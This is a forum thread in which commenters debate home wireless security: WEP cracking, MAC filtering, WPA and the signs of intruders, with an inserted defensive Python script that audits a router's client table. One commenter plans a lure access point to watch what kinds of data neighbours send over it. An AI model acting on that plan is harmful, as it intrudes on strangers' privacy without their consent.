A number of early company breaches were due to some office genius deciding they wanted wireless for their work notebook and making a trip to RadioShack on their lunch hour. A few rather high-profile news stories were due to wide-open routers attached to huge companies. My first thought was a self-installed router, but the idea of a honeypot came to mind next. Spoofed access points are one concern, for phishing or outright overpowering the valid AP to steal its client nodes. The bigger curiosity for me is the number of people who will "interweb" away freely thinking they cleverly got free access without buying a coffee: "Ah, good, I've got a connection. Now, how is my personal email doing, since they block it upstairs in the office?" Once I get a spare rig running honeyd, I think I'm going to leave my secondary router broadcasting "jackthisbtch". It'll be interesting to see who in my area is foolish enough to use an unknown network, or who wants to play. I may even get brave and tunnel it through my valid network to save faking websites, and monitor what categories of information get passed along. (The interest is the types of information, not logging plain text or breaking encrypted packets, if that is important for anyone to know.)

brad

From a user perspective, how would a user know if their wireless network has been hacked using the steps Bill outlined? What are the symptoms of a hack?

poolmanjim

Why would any kid be that persistent? The odds of a serious hacker taking on a home network are very slim, and your everyday college kid with a laptop isn't going to think about spoofing or cracking WEP. In my opinion, MAC filtering and SSID hiding is a reasonable measure (far better than most) when securing a non-essential home connection. The odds of some serious hacker taking you on while you are at your house are so small that it shouldn't be considered. Don't get me wrong, I am a huge fan of security, but sometimes you have to consider if the work is worth the reward, and in the instance of an everyday home. Why would a hacker take a home network for his illegal uses? He can go buy a Big Mac and use the free wireless that McDonald's has and go bouncing around if he has any good proxy software.

Neon Samurai

I don't have much new machine traffic on my home network, so it's just a matter of confirming my wife's machine connects when the pre-shared key is changed, then updating the few guests as applicable. I've found WPA completely user-friendly while being cracker-unfriendly. I also go a step further and use MAC filtering to reduce the noise my router processes, but that's not part of the security considerations. If you've got one of the Linksys routers with an external "easy setup" button and flash the router with DD-WRT instead of Linksys firmware, you can set that physical button as a wifi radio on/off switch, so when you are not using the wireless you can turn it right off; nobody without physical access to the router is getting past that puppy.

Neon Samurai

It's a trip I've made by bus frequently; nature doesn't cut it for me anymore. You can only walk down the same laneway past the old oak tree so many times before the oak loses its novelty. I'm actually more curious as to why the person was so offended that one would be entertained by exploring technology. Even worse, that someone on a technology website could be entertained by exploring technology. ;)

Neon Samurai

You may be a world-class bowler. While bowling bores me to death, I'm not going to give you grief because you choose to roll a rock at five or nine pegs of wood in your free time. Should we give professional race car drivers grief for spending a day at the track, then going for a drive in their own car on the weekend? I spend eight hours a day doing others' bidding with a stock OS build that mostly meets the needs of the job. In my free time, being able to do what I want with machines is relaxing freedom. Some users just want to check their email. Some users want to check email but also know enough to tune the system for a specific game or other task. Knowing what the settings do is less important than seeing a higher frames-per-second count. Some users want to know how each step of the process works and have the freedom to explore and alter it. Technology is a thing to be playfully and creatively explored. Understanding the technology and how it can be extended in creative ways never dreamed of by the manufacturer is the ultimate goal. I am of the third kind. I want to explore what technology can do, not what limited functions the manufacturer sells it for. Once you finish the user manual, start learning what the thing can really do.

To answer your question: it was for personal interest, to see how the breakout of wireless networks appeared; professional curiosity. And because the device was new and I wanted to explore what could be done with the NIC radio and various related tools. Since I did not log any of the passing packets, it was only for interest, with nothing saved for later analysis. What else am I going to do on a bus ride? Learning what my device could do seemed more productive than sleeping, watching video reruns or the rest of the generally passive travel activities. If it's that important to know, I also mountain bike, skateboard (you get strange looks when traveling to the office in a suit with a board ;) ), snowboard, swim and study Iaido. I've had to give up Jiujutsu due to my location relative to the dojo. My vacation activities depend on where the vacation is, but you can bet I'll use some of that free time for my own computing whims as well. I haven't an iPhone; it simply does not provide the functions I get with my existing devices. The monthly plans are also highway robbery, made possible only by blind brand loyalty. Now, what recreational activities do you spend your free time pursuing, so we can all point out which ones bore us individually?

michaelsaltmarsh

Doesn't sound cool when you say it... :( LOL. Sorry to break it to ya, but some of us think that nature is, well, for the birds ;) Now I can't speak for Neo here, but I am not really a big fan myself. The shock and awe that goes along with finding lots of wide-open networks does offer some entertainment while having to endure all of that organic garbage.

Neon Samurai

Watch your traffic and be aware of what machines should be connected. In a home network with only a few nodes, this is not hard to do. If I get a connection appearing that is in my guest IP range (I use statically assigned DHCP) and I don't have a guest over, then it's a visitor. If I get a connection outside my guest range and that machine is not booted, I have a visitor. If I start seeing large amounts of traffic and am not making heavy use of the network, it might be a visitor. If you are connected and someone spoofs your MAC, you will also get some strange behavior. You may be a bit confused when receiving web pages in your browser that have been requested by the visitor's browser (same MAC means you'll both receive the network traffic). The best way to be sure without going security-overboard is to use WPA with a passkey changed regularly. Disallow router administration from WAN or wifi so only wired local machines can change settings. Make your admin password different from your wireless password. Last, get to know your network traffic a little: casually watch connected-client lists for what machines are "on" and note your average upload and download amounts. The spoofed MAC is the part that really puts the grief in detection, since the visitor will appear to be a valid network node unless you know that node is shut down or it starts to collide with the visitor.
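The checks this comment describes (an unexpected client in the guest range, a "powered-off" machine that is suddenly online, and one MAC showing up twice because a visitor cloned it) can be scripted against the router's connected-client table. The following is an added example, not code from the commenter or from the video; the inventory, IP ranges and the client-table snapshot are all constructed for illustration, and a real run would read the table from the router's DHCP lease or ARP list instead.

```python
"""Audit a router's connected-client table against a home-network inventory.

Added example (not from the thread). Flags the symptoms the comment lists:
  - unknown_mac:           a MAC that is not in the inventory
  - guest_range_no_guest:  a client in the guest range when no guest is expected
  - offline_host_online:   a known MAC online while that machine should be off
  - duplicate_mac:         the same MAC seen with more than one IP (what a
                           spoofed/cloned MAC looks like from the router side)
"""
import ipaddress
from collections import defaultdict

# Hypothetical inventory: MAC -> hostname (assumption: static DHCP
# reservations for every known machine, as the comment describes).
KNOWN_HOSTS = {
    "00:11:22:33:44:01": "desktop",
    "00:11:22:33:44:02": "wife-laptop",
    "00:11:22:33:44:03": "nas",
}

# Hypothetical guest pool handed out to anything without a reservation.
GUEST_RANGE = ipaddress.ip_network("192.168.1.200/29")  # .200 - .207

# Constructed snapshot of the router's client table: (MAC, IP).
SNAPSHOT = [
    ("00:11:22:33:44:01", "192.168.1.10"),   # desktop, expected
    ("00:11:22:33:44:02", "192.168.1.11"),   # wife-laptop, expected
    ("00:11:22:33:44:02", "192.168.1.57"),   # same MAC again, different IP
    ("AA:BB:CC:DD:EE:FF", "192.168.1.201"),  # unknown MAC in the guest pool
    ("00:11:22:33:44:03", "192.168.1.12"),   # nas, which we say is powered off
]


def audit(snapshot, known, guest_range, guest_expected=False, powered_off=()):
    """Return a list of (finding, mac, detail) tuples for a client-table snapshot."""
    findings = []
    ips_by_mac = defaultdict(set)
    powered_off = {m.lower() for m in powered_off}

    for mac, ip in snapshot:
        mac = mac.lower()               # normalise case before comparing
        ips_by_mac[mac].add(ip)
        ip_obj = ipaddress.ip_address(ip)

        if mac not in known:
            findings.append(("unknown_mac", mac, ip))
        elif mac in powered_off:
            findings.append(("offline_host_online", mac, ip))

        if ip_obj in guest_range and not guest_expected:
            findings.append(("guest_range_no_guest", mac, ip))

    # A cloned MAC shows up as one hardware address holding several leases.
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            findings.append(("duplicate_mac", mac, ",".join(sorted(ips))))

    return findings


def finding_kinds(findings):
    """Sorted list of finding types, handy for a quick summary or a test."""
    return sorted(kind for kind, _, _ in findings)


if __name__ == "__main__":
    # The NAS is supposed to be shut down and no guest is visiting.
    for kind, mac, detail in audit(SNAPSHOT, KNOWN_HOSTS, GUEST_RANGE,
                                   powered_off={"00:11:22:33:44:03"}):
        print(f"{kind:22} {mac:18} {detail}")
```

Comparing against an inventory catches the easy cases; the duplicate-MAC check is the one that matters for the spoofing shown in the video, because a visitor who clones a whitelisted MAC passes the filter and only becomes visible when the router sees that address on two leases, or when the real machine's traffic starts colliding with the visitor's.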

smarria

Because it's so easy, why would someone travel to a WiFi hotspot when your weak network is next door? A serious hacker might be interested in stealing your identity. Most people do a great deal of banking and other transactions online, as well as keeping sensitive documents like tax returns on their hard disks. It would be very easy for a hacker to access this information once he is in your network.

Neon Samurai

I don't think a kid is going to be motivated to travel 60 miles for a casual look. The neighbor's kid is not a real concern, though, since real criminal enterprise took an interest:

- anonymous communications through a breached and unaware third-party network: the FBI or some other acronym would like to understand why you're talking to someone on a watch list. What did you discuss for the hour-long VoIP call, three email transfers and two large direct file transfers?
- anonymous downloads of criminal content: the FBI or some other acronym would like to talk to you about the RIAA-protected movies and questionable images of small children that have been received at your network address.
- reconnaissance for a high-tech burglar, if it's that nice an area: you'd like to know how your fantastic home security, with cameras in every room all controlled from your personal computer on the network, got broken into and why only the really good stuff was stolen.
- information gathering: enough information to fake an identity can be sold easily. Now someone has enough information out of your network shares, cookies and other personal files for a classic case of fraud. They also have a little "something" left behind to watch your network traffic and send off your new passwords as you change them.

It's not the network or its access location but what someone intends to do with it. This all has to be balanced against reasonable threat, of course, so it shouldn't send someone running in paranoia. With WPA being so easy to manage, there really is no excuse for leaving it open. If you're intentionally leaving it open, make the SSID obvious: "freewifi". Someone else has already mentioned the basic principle of obscurity. It may accidentally provide some benefit but should not be considered part of your security profile and decision-making.

Dumphrey

for normal pass keys. The current record is 8 seconds with a nice laptop. These are not hackers we are talking about, but normal kids. The tools are widely and freely available, and fairly well documented. Anyone with basic Linux skills could learn to do this off the internet using Google in under an hour. Maybe 2 hours on Windows.

"Why would a hacker take a home network for his illegal uses? He can go buy a Big Mac and use the free wireless that McDonald's has and go bouncing around if he has any good proxy software."

Once again, why does it have to be a hacker? P2P chargers are your most likely offense. The kid next door using your wifi to download the latest movie.

"Why would a hacker take a home network for his illegal uses? He can go buy a Big Mac and use the free wireless that McDonald's has and go bouncing around if he has any good proxy software."

Or he could use your wifi, not need proxy software, and have no corporate records of his activity being logged, since cracking WEP is as easy as setting up a proxy server. Finding a MAC is a joke, and a non-broadcast SSID is even less effective than paper parachutes.

InfoSecAuditor

Sorry Poolman, but your logic is flawed. Your "everyday college kid", or high school kid for that matter, has a plethora of freely available tools to help him/her hack into your wireless network. Heck, it's so easy even the FBI can do it. And if we're talking about not having the time to do it, well, who do you think has the most free time on their hands? Security through obscurity does not work. Period. You may not think that home users have a need for wireless security, but the first time someone cracks WEP (or spoofs a MAC, etc.), hops onto your home network and pulls seemingly innocuous information (you know, like bank user IDs, passwords, etc.) or uses the connection to download questionable material, you may change your tune. And in terms of the "work" required to secure a wireless network, I think that's a non-issue. Most consumer-grade APs that I've come across provide a fairly easy interface and step-by-step instructions that illustrate how to secure your wireless.
